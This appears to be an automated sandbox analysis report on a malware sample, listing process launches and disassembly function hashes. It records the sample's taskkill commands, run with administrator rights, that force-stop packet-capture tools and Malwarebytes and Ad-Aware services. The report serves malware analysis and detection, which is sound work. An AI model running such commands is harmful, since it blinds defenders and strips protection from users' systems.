                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:60
                                                                                                                                                                                                                                  Start time:07:02:21
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:61
                                                                                                                                                                                                                                  Start time:07:02:22
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM text2pcap.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:62
                                                                                                                                                                                                                                  Start time:07:02:22
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:63
                                                                                                                                                                                                                                  Start time:07:02:23
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM rawshark.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:64
                                                                                                                                                                                                                                  Start time:07:02:23
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:65
                                                                                                                                                                                                                                  Start time:07:02:24
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM mergecap.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:66
                                                                                                                                                                                                                                  Start time:07:02:24
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:67
                                                                                                                                                                                                                                  Start time:07:02:25
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM editcap.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:68
                                                                                                                                                                                                                                  Start time:07:02:25
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:69
                                                                                                                                                                                                                                  Start time:07:02:26
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM dumpcap.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:70
                                                                                                                                                                                                                                  Start time:07:02:26
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:71
                                                                                                                                                                                                                                  Start time:07:02:27
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM capinfos.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:72
                                                                                                                                                                                                                                  Start time:07:02:27
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:73
                                                                                                                                                                                                                                  Start time:07:02:28
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM mbam.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:74
                                                                                                                                                                                                                                  Start time:07:02:28
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:75
                                                                                                                                                                                                                                  Start time:07:02:29
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM mbamscheduler.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:76
                                                                                                                                                                                                                                  Start time:07:02:29
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:77
                                                                                                                                                                                                                                  Start time:07:02:30
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM mbamservice.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:78
                                                                                                                                                                                                                                  Start time:07:02:30
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:79
                                                                                                                                                                                                                                  Start time:07:02:31
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                                                  Commandline:taskkill /IM AdAwareService.exe /T /F
                                                                                                                                                                                                                                  Imagebase:0xd0000
                                                                                                                                                                                                                                  File size:74'240 bytes
                                                                                                                                                                                                                                  MD5 hash:CA313FD7E6C2A778FFD21CFB5C1C56CD
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  General

                                                                                                                                                                                                                                  Target ID:80
                                                                                                                                                                                                                                  Start time:07:02:31
                                                                                                                                                                                                                                  Start date:17/04/2024
                                                                                                                                                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                  Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                  File size:862'208 bytes
                                                                                                                                                                                                                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                                                  Has exited:true

                                                                                                                                                                                                                                  Disassembly

                                                                                                                                                                                                                                  Reset < >

                                                                                                                                                                                                                                    Executed Functions

                                                                                                                                                                                                                                    Function 02DFD9A5 Relevance: .2, Instructions: 199COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1636214816.0000000002DF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2df2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 0de03eb9bd0af22fa68cb9fb6b447051ab43fcc8a79b1455cb439434f9f65280
                                                                                                                                                                                                                                    • Instruction ID: 0b40c2582adfc8c1cd3fb3db2a214cb131eb82d32c263ad1dca5014c67f8d42d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0de03eb9bd0af22fa68cb9fb6b447051ab43fcc8a79b1455cb439434f9f65280
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1481CB71A04641DFDB98CF20C494BA9F7B2FF49304F0A819DCA5A4B381DB34AC45CBA9
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02DF0672 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1636214816.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2df0000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 72eb23a4cca4d7ff7265445af90e4003f28603f0ab4eb6095204e23820149b54
                                                                                                                                                                                                                                    • Instruction ID: a823d9013561a01ef39416823d25861515433a39870040417827f378f40cc152
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 72eb23a4cca4d7ff7265445af90e4003f28603f0ab4eb6095204e23820149b54
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 03118EB2D0026ADFCF64DF48C4814ADF3B0FB98316B568565DDA9A3346D334AD20CB95
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02DF0722 Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1636214816.0000000002DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF0000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2df0000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e7a893bb73952b4fd77ec0fda071870fc404af5a4797cccea1c5575312c5edae
                                                                                                                                                                                                                                    • Instruction ID: 22862df98b6c0c8f88de0e2e5add583e94bf47136a5bdf680526186cf90c5c7d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e7a893bb73952b4fd77ec0fda071870fc404af5a4797cccea1c5575312c5edae
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 99F01576C00269DB8B54DF88C4401ADB7B1EB44228B2A8496DD6837342D332AD62CF89
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02E04CCD Relevance: .0, Instructions: 22COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1636214816.0000000002DF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2df2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 38b9219d75033f1cda31055ece609c587796263cd1af981708de1be626a6cdbf
                                                                                                                                                                                                                                    • Instruction ID: d0e648ce59c83a2817e88c026cadbcd907c21dd0edf4b31d76048bee776888ef
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 38b9219d75033f1cda31055ece609c587796263cd1af981708de1be626a6cdbf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 82F0DFB5900A06EBEB15CF20C5047EAF7B4FB88704F04420AD42C53310C3787869CBD0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02E04B78 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1636214816.0000000002DF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2df2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: e98e105f214225dce3b7146b04778b1665f25f57836a4a1d79e84bd33878f874
                                                                                                                                                                                                                                    • Instruction ID: 71093cc8b665d30d1c853f298cc6d20152946292d83e957a2bc88e04e0ae356c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e98e105f214225dce3b7146b04778b1665f25f57836a4a1d79e84bd33878f874
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4CF07FB5900A06EBDB158F61C5047DAFBB4BB88718F15421AD52C57350D7787469CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02DFEC1C Relevance: .0, Instructions: 20COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1636214816.0000000002DF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2df2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: cee56451402767770061ae25291275d7cd5f2a2f930ae6c554a114cc0dc58993
                                                                                                                                                                                                                                    • Instruction ID: 9289f1be4f1553e972dfad1bb79c13a4b5c32ca1259806c03223f952b5c2e7d3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: cee56451402767770061ae25291275d7cd5f2a2f930ae6c554a114cc0dc58993
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 45F092B5900A06EBDB15CF61C5047DAFBB4BB88714F15421AD52C67750D7787469CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02DFDA35 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1636214816.0000000002DF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2df2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 7a7b129419281cef7f872ce74380b3d0474d44ff55d20b67174777c2357c1149
                                                                                                                                                                                                                                    • Instruction ID: 915f75cca13bf19bf44089102bc7c20fc767324912ea1057279182d0ac582774
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a7b129419281cef7f872ce74380b3d0474d44ff55d20b67174777c2357c1149
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C8F0CAB6D00A0AABDB258F61C5047DAFBB4BB88714F19421AC52C63320D378B4A9CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02E043B9 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1636214816.0000000002DF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2df2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 291a20e96f5f00b88945569c4f83d94062b1b24144fb9828c5b4d4b57fb18643
                                                                                                                                                                                                                                    • Instruction ID: 234356e5fdf6ba86dd51175307b37eecf47ddbe951a3d8c5bda6f845ef22f407
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 291a20e96f5f00b88945569c4f83d94062b1b24144fb9828c5b4d4b57fb18643
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E9F0C2B6D00A06ABDB248F61C5047CAFBB4BB48714F15421AC52C63310D3787469CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02E03C76 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1636214816.0000000002DF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_2df2000_java.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                    • Opcode ID: 842a94514b46481bc4f8a29dad0555f780c1664830d35bf97b9533ef4568473a
                                                                                                                                                                                                                                    • Instruction ID: 23bfcf87df57fc72f4448f55f7e5c4c68513aa8a19eabfcf58d8382d8ecbeeca
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 842a94514b46481bc4f8a29dad0555f780c1664830d35bf97b9533ef4568473a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4F0CAB6D00A0AABDB648FA1C5447CAFBB4BB88714F15421AC52C67320D378B4A9CBC0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02E045E9 Relevance: .0, Instructions: 18COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.1636214816.0000000002DF2000.00000040.00000800.00020000.00000000.sdmp, Offset: 02DF2000, based on PE: false
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
